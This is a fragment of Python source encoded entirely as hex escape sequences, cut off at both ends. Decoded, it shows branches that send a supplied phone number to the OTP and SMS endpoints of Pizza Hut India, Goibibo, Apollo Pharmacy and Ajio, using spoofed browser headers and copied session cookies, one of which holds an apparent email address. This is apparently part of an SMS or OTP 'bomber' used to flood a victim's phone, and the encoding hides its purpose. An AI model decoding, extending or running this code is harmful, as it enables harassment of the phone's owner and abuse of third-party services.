\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x61\x76\x65\x2d\x64\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6c\x61\x6e\x67\x75\x61\x67\x65\x63\x6f\x64\x65\x27\x3a\x20\x27\x65\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x72\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x2e\x70\x69\x7a\x7a\x61\x68\x75\x74\x2e\x63\x6f\x2e\x69\x6e\x2f\x6c\x6f\x67\x69\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6f\x6b\x69\x65\x27\x3a\x20\x27\x41\x4b\x41\x5f\x41\x32\x3d\x41\x27\x7d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x22\x63\x75\x73\x74\x6f\x6d\x65\x72\x22\x3a\x7b\x22\x4d\x6f\x62\x69\x6c\x65\x4e\x6f\x22\x3a\x70\x6e\x2c\x22\x55\x73\x65\x72\x4e\x61\x6d\x65\x22\x3a\x70\x6e\x2c\x22\x6d\x65\x72\x63\x68\x61\x6e\x74\x49\x64\x22\x3a\x22\x39\x38\x64\x31\x38\x64\x38\x32\x2d\x62\x61\x35\x39\x2d\x34\x39\x35\x37\x2d\x39\x63\x39\x32\x2d\x33\x66\x38\x39\x32\x30\x37\x61\x33\x34\x66\x36\x22\x7d\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x2e\x70\x69\x7a\x7a\x61\x68\x75\x74\x2e\x63\x6f\x2e\x69\x6e\x2f\x61\x70\x69\x2f\x63\x61\x72\x74\x2f\x73\x65\x6e\x64\x2d\x6f\x74\x70\x3f\x6c\x61\x6e\x67\x43\x6f\x64\x65\x3d\x65\x6e\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61
\x64\x65\x72\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x31\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x68\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x67\x6f\x69\x62\x69\x62\x6f\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x38\x2e\x30\x3b\x20\x57\x69\x6e\x33\x32\x3b\x20\x78\x33\x32\x3b\x20\x72\x76\x3a\x35\x38\x2e\x30\x29\x20\x47\x65\x63\x6b\x6f\x2f\x32\x30\x31\x30\x30\x31\x30\x31\x20\x46\x69\x72\x65\x66\x6f\x78\x2f\x35\x37\x2e\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x68\x74\x6d\x6c\x2b\x78\x6d\x6c\x2c\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x6d\x6c\x3b\x71\x3d\x30\x2e\x39\x2c\x2a\x2f\x2a\x3b\x71\x3d\x30\x2e\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x72\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x6f\x69\x62\x69\x62\x6f\x2e\x63\x6f\x6d\x2f\x6d\x6f\x62\x69\x6c\x65\x2f\x3f\x73\x6d\x73\x3d\x73\x75\x63\x63\x65\x73\x73\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74
\x65\x6e\x74\x2d\x74\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x31\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x70\x67\x72\x61\x64\x65\x2d\x69\x6e\x73\x65\x63\x75\x72\x65\x2d\x72\x65\x71\x75\x65\x73\x74\x73\x27\x3a\x20\x27\x31\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x27\x6d\x62\x6c\x27\x3a\x20\x70\x6e\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x6f\x69\x62\x69\x62\x6f\x2e\x63\x6f\x6d\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x64\x6f\x77\x6e\x6c\x6f\x61\x64\x73\x6d\x73\x2f\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x32\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x61\x70\x6f\x6c\x6c\x6f\x70\x68\x61\x72\x6d\x61\x63\x79\x2e\x69\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x31\x37\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x70\x6f\x6c
\x6c\x6f\x70\x68\x61\x72\x6d\x61\x63\x79\x2e\x69\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x78\x2d\x72\x65\x71\x75\x65\x73\x74\x65\x64\x2d\x77\x69\x74\x68\x27\x3a\x20\x27\x58\x4d\x4c\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x61\x76\x65\x2d\x64\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x72\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x70\x6f\x6c\x6c\x6f\x70\x68\x61\x72\x6d\x61\x63\x79\x2e\x69\x6e\x2f\x73\x6f\x63\x69\x61\x6c\x6c\x6f\x67\x69\x6e\x2f\x6d\x6f\x62\x69\x6c\x65\x2f\x6c\x6f\x67\x69\x6e\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e
\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6f\x6b\x69\x65\x27\x3a\x20\x27\x73\x65\x63\x74\x69\x6f\x6e\x5f\x64\x61\x74\x61\x5f\x69\x64\x73\x3d\x25\x37\x42\x25\x32\x32\x63\x61\x72\x74\x25\x32\x32\x25\x33\x41\x31\x35\x36\x30\x32\x33\x39\x37\x35\x31\x25\x37\x44\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x27\x6d\x6f\x62\x69\x6c\x65\x27\x3a\x20\x70\x6e\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x70\x6f\x6c\x6c\x6f\x70\x68\x61\x72\x6d\x61\x63\x79\x2e\x69\x6e\x2f\x73\x6f\x63\x69\x61\x6c\x6c\x6f\x67\x69\x6e\x2f\x6d\x6f\x62\x69\x6c\x65\x2f\x73\x65\x6e\x64\x6f\x74\x70\x2f\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x3d\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x74\x65\x78\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x66\x69\x6e\x64\x28\x22\x73\x65\x6e\x74\x22\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x33\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6f\x6f\x6b\x69\x65\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x61\x27\x3a\x20\x27\x47\x41\x31\x2e\x32\x2e\x39\x37\x39\x39\x32\x38\x33\x31\x39\x2e\x31\x35\x36\x30\x33\x36\x34\x30\x37\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x69\x64\x27\x3a\x20\x27\x47\x41\x31\x2e\x32\x2e\x36\x36\x36\x32\x37\x30\x32\x31\x36\x2e\x31\x35\x36\x30\x33\x36\x34\x30\x37\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x56\x27\x3a\x20\x27\x32\x30\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x66\x62\x70\x27\x3a\x20\x27\x66\x62\x2e\x31
\x2e\x31\x35\x36\x30\x33\x36\x34\x30\x37\x36\x39\x31\x33\x2e\x31\x35\x32\x38\x33\x34\x39\x37\x32\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x74\x6f\x5f\x6c\x77\x69\x64\x27\x3a\x20\x27\x64\x39\x31\x62\x65\x61\x33\x61\x2d\x37\x36\x31\x30\x2d\x34\x35\x61\x61\x2d\x38\x66\x37\x38\x2d\x36\x35\x61\x30\x64\x37\x34\x30\x66\x62\x34\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x50\x75\x73\x68\x53\x75\x62\x73\x63\x72\x69\x62\x65\x72\x53\x74\x61\x74\x75\x73\x27\x3a\x20\x27\x44\x45\x4e\x49\x45\x44\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x70\x65\x63\x6c\x6f\x73\x65\x64\x27\x3a\x20\x27\x74\x72\x75\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x47\x5f\x45\x4e\x41\x42\x4c\x45\x44\x5f\x49\x44\x50\x53\x27\x3a\x20\x27\x67\x6f\x6f\x67\x6c\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x54\x53\x30\x31\x38\x63\x63\x35\x39\x33\x27\x3a\x20\x27\x30\x31\x65\x66\x36\x31\x61\x65\x64\x30\x66\x63\x61\x31\x31\x30\x66\x35\x30\x64\x38\x65\x33\x62\x65\x32\x63\x36\x36\x65\x62\x38\x33\x31\x38\x38\x66\x36\x64\x66\x38\x34\x39\x35\x63\x30\x65\x64\x32\x63\x64\x37\x37\x32\x38\x32\x39\x33\x37\x30\x66\x63\x31\x32\x36\x39\x30\x39\x35\x34\x61\x61\x64\x30\x38\x33\x34\x66\x35\x34\x35\x62\x35\x37\x37\x36\x34\x34\x36\x37\x64\x62\x62\x36\x36\x65\x66\x62\x30\x35\x64\x34\x38\x31\x61\x38\x39\x35\x38\x61\x65\x62\x62\x32\x37\x33\x37\x35\x31\x39\x35\x36\x65\x66\x39\x65\x62\x33\x38\x33\x61\x33\x62\x61\x32\x32\x64\x64\x31\x63\x39\x34\x64\x38\x32\x30\x32\x31\x65\x39\x64\x34\x63\x34\x30\x30\x31\x31\x64\x34\x61\x62\x39\x62\x64\x39\x37\x63\x36\x66\x30\x61\x37\x34\x36\x32\x38\x61\x63\x31\x32\x65\x38\x66\x37\x62\x63\x62\x36\x36\x33\x63\x31\x36\x30\x38\x65\x37\x32\x38\x38\x65\x62\x64\x32\x35\x32\x30\x35\x31\x63\x62\x38\x34\x64\x65\x66\x33\x62\x30\x32\x31\x64\x33\x62\x63\x66\x36\x34\x33\x64\x33\x66\x33\x37\x32\x38\x63\x61\x39\x63\x30\x64\x39\x63\x37\x38\x30\x64\x31\x37\x31\x35\x37\x38\x62\x61\x39\x36\x36\x37\x37\x34
\x66\x31\x31\x61\x63\x34\x34\x38\x36\x34\x61\x37\x66\x33\x64\x61\x35\x39\x37\x39\x31\x63\x62\x35\x35\x66\x32\x37\x34\x31\x66\x32\x33\x64\x37\x32\x66\x37\x38\x34\x33\x65\x66\x65\x39\x33\x30\x36\x34\x35\x39\x63\x30\x30\x65\x63\x32\x65\x35\x66\x30\x30\x30\x36\x35\x37\x32\x39\x61\x38\x35\x37\x33\x62\x61\x62\x61\x34\x32\x33\x38\x34\x62\x62\x37\x63\x66\x34\x36\x65\x62\x35\x35\x63\x66\x38\x39\x66\x37\x32\x66\x31\x64\x63\x64\x35\x36\x31\x39\x61\x32\x36\x65\x34\x66\x66\x33\x32\x63\x36\x33\x64\x30\x36\x63\x61\x63\x38\x63\x34\x62\x62\x31\x35\x38\x64\x61\x36\x36\x34\x30\x62\x63\x30\x62\x31\x31\x31\x39\x33\x31\x33\x34\x63\x62\x66\x33\x38\x30\x35\x30\x61\x65\x30\x64\x62\x32\x33\x30\x61\x61\x32\x35\x38\x62\x31\x31\x38\x31\x37\x34\x39\x66\x62\x30\x33\x37\x33\x61\x66\x65\x30\x34\x31\x61\x64\x31\x61\x65\x66\x66\x64\x30\x63\x30\x38\x62\x65\x37\x61\x36\x32\x30\x31\x30\x64\x62\x30\x32\x63\x63\x36\x35\x65\x64\x66\x62\x31\x33\x34\x31\x64\x32\x64\x65\x35\x34\x63\x64\x66\x34\x37\x35\x63\x35\x64\x63\x64\x38\x34\x65\x31\x36\x63\x36\x34\x63\x35\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x67\x61\x63\x5f\x55\x41\x2d\x36\x38\x30\x30\x32\x30\x33\x30\x2d\x31\x27\x3a\x20\x27\x31\x2e\x31\x35\x36\x30\x33\x36\x36\x31\x39\x37\x2e\x43\x6a\x30\x4b\x43\x51\x6a\x77\x78\x59\x4c\x6f\x42\x52\x43\x78\x41\x52\x49\x73\x41\x45\x66\x31\x36\x2d\x74\x78\x35\x55\x58\x72\x72\x50\x39\x53\x45\x68\x52\x38\x64\x50\x6b\x54\x4c\x34\x61\x39\x77\x6f\x45\x46\x37\x41\x65\x2d\x6b\x76\x53\x6c\x7a\x4b\x64\x67\x71\x33\x35\x79\x33\x31\x44\x65\x4b\x33\x5f\x75\x68\x67\x38\x61\x41\x6b\x52\x42\x45\x41\x4c\x77\x5f\x77\x63\x42\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x64\x69\x67\x69\x4d\x72\x6b\x74\x27\x3a\x20\x27\x75\x74\x6d\x5f\x73\x6f\x75\x72\x63\x65\x25\x33\x41\x25\x37\x43\x75\x74\x6d\x5f\x6d\x65\x64\x69\x75\x6d\x25\x33\x41\x25\x37\x43\x64\x65\x76\x69\x63\x65\x25\x33\x41\x6d\x6f\x62\x69\x6c\x65\x25\x37\x43\x65\x78\x70\x69\x72\x65\x73\x25\x33\x41\x46\x72\x69\x25\x32\x43\x25\x32\x30
\x31\x32\x25\x32\x30\x4a\x75\x6c\x25\x32\x30\x32\x30\x31\x39\x25\x32\x30\x31\x39\x25\x33\x41\x30\x33\x25\x33\x41\x31\x37\x25\x32\x30\x47\x4d\x54\x25\x37\x43\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x49\x6d\x70\x72\x65\x73\x73\x69\x6f\x6e\x43\x6f\x6f\x6b\x69\x65\x27\x3a\x20\x27\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x69\x70\x27\x3a\x20\x27\x31\x30\x2e\x31\x2e\x31\x30\x2e\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x65\x73\x73\x69\x6f\x6e\x53\x74\x61\x74\x75\x73\x27\x3a\x20\x27\x74\x72\x75\x65\x7c\x75\x6e\x64\x65\x66\x69\x6e\x65\x64\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x46\x69\x72\x73\x74\x50\x61\x67\x65\x27\x3a\x20\x27\x54\x68\x75\x20\x4a\x75\x6e\x20\x31\x33\x20\x32\x30\x31\x39\x20\x30\x30\x3a\x33\x33\x3a\x35\x33\x20\x47\x4d\x54\x2b\x30\x35\x33\x30\x20\x28\x49\x6e\x64\x69\x61\x20\x53\x74\x61\x6e\x64\x61\x72\x64\x20\x54\x69\x6d\x65\x29\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x64\x63\x5f\x67\x74\x6d\x5f\x55\x41\x2d\x36\x38\x30\x30\x32\x30\x33\x30\x2d\x31\x27\x3a\x20\x27\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x49\x27\x3a\x20\x27\x6a\x6f\x68\x6e\x79\x61\x68\x6f\x25\x34\x30\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x54\x53\x30\x31\x66\x65\x34\x32\x34\x39\x27\x3a\x20\x27\x30\x31\x65\x66\x36\x31\x61\x65\x64\x30\x39\x63\x33\x32\x63\x36\x61\x35\x33\x63\x65\x39\x65\x34\x33\x31\x61\x36\x61\x37\x31\x39\x63\x34\x31\x36\x38\x36\x37\x66\x32\x66\x33\x61\x64\x37\x31\x33\x66\x64\x65\x32\x65\x37\x34\x31\x37\x35\x62\x63\x32\x34\x38\x61\x63\x63\x37\x61\x35\x32\x33\x66\x34\x31\x65\x39\x37\x35\x31\x64\x30\x33\x32\x38\x35\x39\x61\x31\x35\x39\x62\x66\x66\x66\x38\x37\x36\x36\x34\x62\x39\x30\x63\x33\x64\x30\x61\x39\x64\x66\x62\x32\x33\x39\x32\x66\x37\x35\x38\x37\x36\x63\x63\x62\x65\x32\x37\x33\x62\x38\x61\x38\x65\x38\x31\x64\x37\x61\x38\x64\x32\x35\x30\x34\x37\x34\x35\x33
\x63\x31\x37\x61\x32\x39\x30\x35\x65\x63\x61\x37\x65\x66\x66\x32\x36\x62\x37\x38\x30\x63\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x61\x6a\x69\x6f\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x31\x34\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x4f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x6a\x69\x6f\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x6a\x69\x6f\x2e\x63\x6f\x6d\x2f\x73\x69\x67\x6e
\x75\x70\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x22\x66\x69\x72\x73\x74\x4e\x61\x6d\x65\x22\x3a\